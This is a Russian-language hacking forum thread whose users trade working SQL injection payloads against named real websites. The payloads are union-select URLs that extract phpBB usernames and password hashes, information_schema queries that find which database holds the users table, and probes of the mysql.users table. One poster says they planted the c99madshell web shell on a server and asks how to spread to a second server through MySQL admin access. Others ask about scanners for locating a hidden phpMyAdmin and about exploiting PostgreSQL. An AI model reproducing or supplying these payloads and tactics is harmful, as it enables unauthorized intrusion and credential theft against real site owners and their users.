Понял, спасибо. Я хочу вытащить с помощью игьекции хеши из форума phpbb2. Они вместе в одной базе данных. Составляю запрос по типу: http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),username,user_password),7,8,9,10,11,12+from+phpbb_users+limit+1,1/* Как действовать в этом случае?
Я знаю, что нет. Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил. Собрался составить запрос, чтобы вытащить данные. Не дала,
ну ты сам на свой вопрос и ответил. Таблицы phpbb_users именно в этой базе нет... когда вытаскивал название таблиц ... надо было ещо и table_schema глянуть а не только table_name
PHP: union+select+1,2,concat_ws(0x3a,table_name,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)+limit+0,1/* Удобно при поиске таблиц, содержащих в себе поля в которых есть сочетание "pas" Red sps.
я недавно с таким сталкивался.. просто таблица phpbb_users находится в другой ДБ.. собственно вот запрос: Code: http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2e,table_schema,table_name),7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+1,1/* так узнаем имя той ДБ, где висит табличка phpbb_users, что нам и надо, и составляем запрос на выборку из этой таблички.
Здравствуйте! Залил c99madshell на сервер 1. Есть доступ admin через c99madshell в MySQL базы сервера 2. Скажите, как можно залить шелл на сервер 2, если есть только admin доступ к MySQL базам этого сервера? Спасибо!
http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ=&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f15bdf6a24b5889fe90dde026 Бошка не варит у мя совсем((( подскажите
эм... а чем помогать то? это вроде как не скул инж... там в параметре area передается адрес к файлу: Code: http://darkbrotherhood.ru/index.php?area=1asd&p=static&page=offres попробуй это заюзать, может получится...
кстати версия мускула не 4, а 5... но доступа к information_schema юзверь не имеет... Code: http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+information_schema.tables/*
На выделеном сервере установлен phpmyadmin, как его можно найти, при условии, что папка переименова? Существуют какие-нибудь сканеры?
Ну а как ты его найдёшь? _https://forum.antichat.ru/threadnav40031-1-10.html Сканер. Или поищи скрипт nikto.pl
кстати по этому запросу говорит не то что нет доступа к базе... а то что базы не существует.. просто запрос неправельный.. Code: http://darkbrotherhood.ru/index.php?area=1+union+select+1,2,3,4,5,6+from+mysql.users/* вот тут реально говорит что доступа к таблице нет...
gisTy, во-первых запрос правильный, во-вторых Access denied for user 'darkbrot_mysql'@'%' to database 'mysql' переводица как Доступ запрещен бла-бла-бла, а Doesn't exist - не существует.
nicto.pl - для cgi. Он не подходит. Скрипты не помогли Пытаюсь загрузить через думпер, пишет 500 ошибку.
Как подкл к Postgresql ?) и что там можно надыбать?) Точнее я нашол уязв она сообщ что моно приконектиться
